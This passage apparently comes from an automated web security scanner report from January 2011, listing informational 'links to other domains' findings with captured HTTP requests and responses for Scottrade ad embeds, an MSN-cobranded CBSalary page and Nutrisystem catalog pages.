GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542**;10,1,103;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Flp_@2Fwelcome_@2F_@3Fcid%3DAM%7C33%7C967%7C555%7C0_@26rid%3DL%7C0_@26amvid%3D4d2cdd9abba1d HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/lp/welcome/?cid=AM|33|967|555|0&rid=L|0&amvid=4d2cdd9abba1d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 02:49:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2d169fde28d; expires=Sat, 12-Feb-2011 02:49:03 GMT; path=/
Set-Cookie: piba_8_21=1; expires=Sat, 12-Feb-2011 02:49:03 GMT; path=/
Set-Cookie: o=1:1; expires=Tue, 12-Apr-2011 02:49:03 GMT; path=/; domain=.wsod.com
Set-Cookie: i_8=7:21:84:0:0:36941:1294800543:L; expires=Fri, 11-Feb-2011 02:49:03 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 701

   function cmsOOB2184() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc29
...[SNIP]...
.84.oob.355x162/**;10.1103;1920;1200;http:_@2F_@2Fwww.scottrade.com_@2Flp_@2Fwelcome_@2F_@3Fcid=AM|33|967|555|0_@26rid=L|0_@26amvid=4d2cdd9abba1d;'+rand;
   }
       function wsod_image() {
       document.write('<a href="https://apply.scottrade.com/?pid=HPB:whychoose" target="_parent" onmousedown="cmsOOB2184()" title=" "><img style="border:none;" src="//admedia.wsod.com/media/5f7eefdbd0f4af885fc291827f23e4b0/Welcome - Community .png" alt=" " />
...[SNIP]...

10.6. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**;10,1,103;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Flp_@2Fwelcome_@2F_@3Fcid%3DAM%7C33%7C967%7C555%7C0_@26rid%3DL%7C0_@26amvid%3D4d2cdd9abba1d HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/lp/welcome/?cid=AM|33|967|555|0&rid=L|0&amvid=4d2cdd9abba1d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d2d169fde28d; piba_8_21=1; o=1:1; i_8=7:21:84:0:0:36941:1294800543:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 02:49:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2d169fde28d; expires=Sat, 12-Feb-2011 02:49:12 GMT; path=/
Set-Cookie: piba_8_22=1; expires=Sat, 12-Feb-2011 02:49:12 GMT; path=/
Set-Cookie: i_8=7:22:80:11:0:36941:1294800552:L|7:21:84:0:0:36941:1294800543:L; expires=Fri, 11-Feb-2011 02:49:12 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 587

   function wsod_iframeurl() {
       document.write('<iframe style="padding:0px;margin:0px;" src="http://research.scottrade.com/services/modules/smarttext/smarttext.asp?click=//scottrade.wsod.com/click/5f7eefdbd0f4af885fc291827f23e4b0/22.80.js.677x230/**;10.1103;1920;1200;http:_@2F_@2Fwww.scottrade.com_@2Flp_@2Fwelcome_@2F_@3Fcid=AM|33|967|555|0_@26rid=L|0_@26amvid=4d2cdd9abba1d&symbol=&issue_type=&scode=&name=&wsodissue=&recent=" title="Click to find out more!" border="0" frameBorder="0" scrolling="no" width="677" height="230"></iframe>
...[SNIP]...

10.7. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**;10,1,103;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Flp_@2Fwelcome_@2F_@3Fcid%3DAM%7C33%7C967%7C555%7C0_@26rid%3DL%7C0_@26amvid%3D4d2cdd9abba1d HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/lp/welcome/?cid=AM|33|967|555|0&rid=L|0&amvid=4d2cdd9abba1d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d2d169fde28d; piba_8_21=1; o=1:1; i_8=7:21:84:0:0:36941:1294800543:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 03:40:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2d169fde28d; expires=Sat, 12-Feb-2011 03:40:42 GMT; path=/
Set-Cookie: piba_8_22=1; expires=Sat, 12-Feb-2011 03:40:42 GMT; path=/
Set-Cookie: i_8=7:22:83:11:0:36941:1294803642:L|7:21:84:0:0:36941:1294800543:L; expires=Fri, 11-Feb-2011 03:40:42 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 538

   function wsod_iframeurl() {
       document.write('<iframe style="padding:0px;margin:0px;" src="http://research.scottrade.com/services/modules/comparison/comparison.asp?click=//scottrade.wsod.com/click/5f7eefdbd0f4af885fc291827f23e4b0/22.83.js.677x230/**;10.1103;1920;1200;http:_@2F_@2Fwww.scottrade.com_@2Flp_@2Fwelcome_@2F_@3Fcid=AM|33|967|555|0_@26rid=L|0_@26amvid=4d2cdd9abba1d&" title="Click to find out more!" border="0" frameBorder="0" scrolling="no" width="677" height="230"></iframe>
...[SNIP]...

10.8. http://www.cbsalary.com/quizzes/fun-jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbsalary.com
Path:   /quizzes/fun-jobs/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /quizzes/fun-jobs/?lr=cbmsn&siteid=cbmsnjmBOB HTTP/1.1
Host: www.cbsalary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29755
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=d0331698c5b74becb838ec5848794ddb-348096318-w6-6; domain=.cbsalary.com; path=/; HttpOnly
Set-Cookie: BID=X14B3012F216803CA5A346885C92D4AFD4CF26C5E0660753222F71FB3571EF700C0303ECCC53B2856E2B1E284829982B21; domain=.cbsalary.com; expires=Thu, 12-Jan-2012 02:25:17 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR6
Date: Wed, 12 Jan 2011 02:25:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Salary
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="stylesheet" type="text/css" href="http://clib.icbdr.com/v11.72/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://clib.icbdr.com/v11.72/css/cbsalary.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://clib.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type="text/javascript" src="http://clib.icbdr.com/v11.72/Common/js/jquery/jquery.cblibrary.min.js"></script><script type="text/javascript" src="http://clib.icbdr.com/v11.72/Common/js/cbsalary/swfobject.js"></script>


<link id="lnkFavIcon" rel="Shortcut Icon" href="http://clib.icbdr.com/images/cbsalary/favicon.ico" />


<!--Test-->
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/css/homepagev2.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/css/jobseeker.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/css/msn_full.css" /><link rel="stylesheet" media="print" type="text/css" href="http://img.icbdr.com/css/printbase.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/CBLibrary.js"></script><script type="text/javascript" src="http://img.icbdr.com/Common/js/ajaxbase.js"></script>
...[SNIP]...
<!-- the framework files: -->
<script type="text/javascript" src="http://blstj.msn.com/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://ads1.msn.com/library/dap.js"></script>
<script type="text/javascript" src="http://sc.msn.com/scr/car/careers.js"></script>
<script type="text/javascript" src="http://hp.msn.com/scr/op/ol-fdbkv3_r1.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.msn.com/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id="reporting">
       <img id="ctag" width="1" height="1" alt="" src="http://c.msn.com/c.gif?di=15128"/>
   </div>
...[SNIP]...
<li class="c1">
<a href="http://www.msnbc.msn.com/">News</a>
...[SNIP]...
<li class="first">
<a href="http://www.msnbc.msn.com/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li>
<a href="http://local.msn.com/news.aspx">Local News</a>
...[SNIP]...
<li>
<a href="http://www.msnbc.msn.com/id/3096434/ns/msnbc_tv">MSNBC TV</a>
...[SNIP]...
<li>
<a href="http://www.msnbc.msn.com/id/3032553/ns/politics">Politics</a>
...[SNIP]...
<li>
<a href="http://www.msnbc.msn.com/id/3032118/ns/technology_and_science">Tech & Science</a>
...[SNIP]...
<li>
<a href="http://today.msnbc.msn.com/">Today Show</a>
...[SNIP]...
<li>
<a href="http://www.msnbc.msn.com/id/3032525/ns/us_news">US News</a>
...[SNIP]...
<li>
<a href="http://video.msnbc.com">Video</a>
</li>
<li>
<a href="http://local.msn.com/weather.aspx">Weather</a>
...[SNIP]...
<li>
<a href="http://www.msnbc.msn.com/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2">

<a href="http://entertainment.msn.com/">Entertainment</a>
...[SNIP]...
<li class="first">
<a href="http://wonderwall.msn.com/">Celebrities</a>
...[SNIP]...
<li>
<a href="http://entertainment.msn.com/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li>
<a href="http://zone.msn.com/en-us/home">Games</a>
</li>
<li>

<a href="http://movies.msn.com/">Movies</a>
</li>
<li>
<a href="http://music.msn.com/">Music</a>
</li>
<li>
<a href="http://entertainment.msn.com/superfans/"> Superfans</a>
...[SNIP]...
<li>
<a href="http://tv.msn.com/"> TV</a>
</li>

<li>
<a href="http://entertainment.msn.com/video/"> Video</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first">
<a href="http://msn.foxsports.com/mlb"> MLB</a>

</li>
<li>
<a href="http://msn.foxsports.com/nascar ">NASCAR</a>
</li>
<li>
<a href="http://msn.foxsports.com/nba">NBA</a>
</li>
<li>
<a href="http://msn.foxsports.com/cbk">NCAA Basketball</a>
...[SNIP]...
<li>
<a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video ">Video</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.msn.com/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.msn.com/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.msn.com/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://realestate.msn.com/">Real Estate</a>
...[SNIP]...
<li><a href="http://articles.moneycentral.msn.com/video/default.aspx ">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.msn.com/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://health.msn.com/diet-and-fitness.aspx">Diet & Fitness</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health</a></li><li><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.msn.com/your-look/video/ ">Video</a></li><li><a href="http://lifestyle.msn.com/your-home/">Your Home</a></li><li><a href="http://lifestyle.msn.com/your-life/ ">Your Life</a></li><li><a href="http://lifestyle.msn.com/your-look/">Your Look </a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://my.msn.com/">My MSN</a></li><li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268">Personals</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://realestate.msn.com/">Real Estate</a>
...[SNIP]...
<li><a href="http://wonderwall.msn.com/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.msn.com">Horoscopes</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="http://yellowpages.msn.com/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://local.msn.com/gas-traffic.aspx">Traffic</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo">
<a href="http://www.bing.com/search?FORM=AP">Bing</a>
...[SNIP]...
<li class="first">
<a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg">
<a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last">

<a href="http://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=10&amp;ct=1178121103&amp;rver=4.0.1532.0&amp;wp=LBI&amp;wreply=http:%2F%2Fcareers.msn.com%2F&amp;lc=1033&amp;id=74314">Sign in</a>
...[SNIP]...
<div id="logo">
<a href="http://www.msn.com">
<img id="msnlogo" src="http://blstc.msn.com/br/gbl/lg/1/t/msft.png" title="go to MSN.com" alt="go to MSN.com" />
</a>
...[SNIP]...
<div class="selected">
<a id="sslink" href="http://careers.msn.com/search/searchresult.aspx">Search this site</a>
...[SNIP]...
<div>
<a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<div id="optlinks" class="link">
<a href="http://msn.empleoscb.com/">Espa..ol</a>
...[SNIP]...
<strong>
<a href="http://careers.msn.com">Careers</a>

</strong>
<a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<a id="_ctl0_lnkCBSalaryCobrand" class="cbSal_logo" href="http://www.cbsalary.com/?lr=cbmsn"><img id="_ctl0_imgCBSalaryCobrand" alt="cbsalary.com - Salary Calculator" title="cbsalary.com - Salary Calculator" src="http://img.icbdr.com/images/cbsalary/logo_cbsalary-cobrand.gif" border="0" style="height:42px;width:187px;" /></a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=negotiate+salary&FORM=ap">Bing: How to negotiate your salary</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=free+salary+calculator&form=ap">Bing: Research salaries in your area</a>
...[SNIP]...
<!-- Regular Ad Call -->
   
   <img id="adMiddle_imgAd" src="http://img.icbdr.com/images/cbsalary/ads/header_adCalloutWide.gif" alt="advertisement" border="0" style="height:14px;width:289px;" />
   
<div class="cbSal_adContainer">
...[SNIP]...
<div class="cbSal_adFrame">
<iframe id="adMiddle_iframeRegularAdCall" width="300" marginwidth="0" scrolling="no" height="250" marginheight="0" noresize="" vspace="0" hspace="0" frameborder="0" src="http://www.careerbuilder.com/RTQ/CBAd.aspx?lr=cbmsn?w=300&amp;h=250&amp;s=csal&amp;pid=20220610&amp;rawwords=&amp;soc=&amp;jn=&amp;sal=&amp;a=advice&amp;site=CS&amp;place=7"></iframe>
...[SNIP]...
<li class="first">
                        <a href="http://g.msn.com/0PR_/enus">MSN privacy</a>
...[SNIP]...
<li>
                        <a href="http://g.msn.com/0TO_/enus">Legal</a>
...[SNIP]...
<li>
                        <a href="http://advertising.msn.com/">Advertise</a>
...[SNIP]...
<li class="last">
                        <a href="http://rss.msn.com/">RSS</a>
...[SNIP]...
<li class="first">
                        <a href="http://msn.careerbuilder.com/JobSeeker/Help/">Help</a>
...[SNIP]...
<!-- START / Copyright 2001-2009, Opinionlab, Inc. -->
<a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mOfBxBiy" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6035061&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.msn.com/br/chan/om/js/s_code.2010.09.15.js"></script>
...[SNIP]...
<noscript><img src = "http://msnportalcareers.112.2O7.net/b/ss/msnportalcareers/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

10.9. http://www.nutrisystem.com/jsps_hmr/catalog/men/basic.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/basic.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jsps_hmr/catalog/men/basic.jsp?categoryId=358 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
<li><a href="http://nutrisystem.ca">Canada - English</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66836&amp;p=irol-IRHome" onclick="omni_track('InvestorRelations:footer');">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.nutrisystemnews.com/" target="_blank" onclick="omni_track('MediaInquires:footer');">Media Inquires</a>
...[SNIP]...
<li><a href="http://www.nutrisystemblog.com/" onclick="omni_track('NutrisystemBlog:footer');">Nutrisystem Blog</a>
...[SNIP]...

10.10. http://www.nutrisystem.com/jsps_hmr/catalog/men/diabetes.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/diabetes.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jsps_hmr/catalog/men/diabetes.jsp?categoryId=379 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Location: /jsps_hmr/product-pages/diabetic_overview.jsp
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- Defect #671 - Need to inc
...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">Download the free Flash Player now!</a>
...[SNIP]...
<li><a href="http://nutrisystem.ca">Canada - English</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66836&amp;p=irol-IRHome" onclick="omni_track('InvestorRelations:footer');">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.nutrisystemnews.com/" target="_blank" onclick="omni_track('MediaInquires:footer');">Media Inquires</a>
...[SNIP]...
<li><a href="http://www.nutrisystemblog.com/" onclick="omni_track('NutrisystemBlog:footer');">Nutrisystem Blog</a>
...[SNIP]...

10.11. http://www.nutrisystem.com/jsps_hmr/catalog/men/silver.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/silver.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jsps_hmr/catalog/men/silver.jsp?categoryId=369 HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
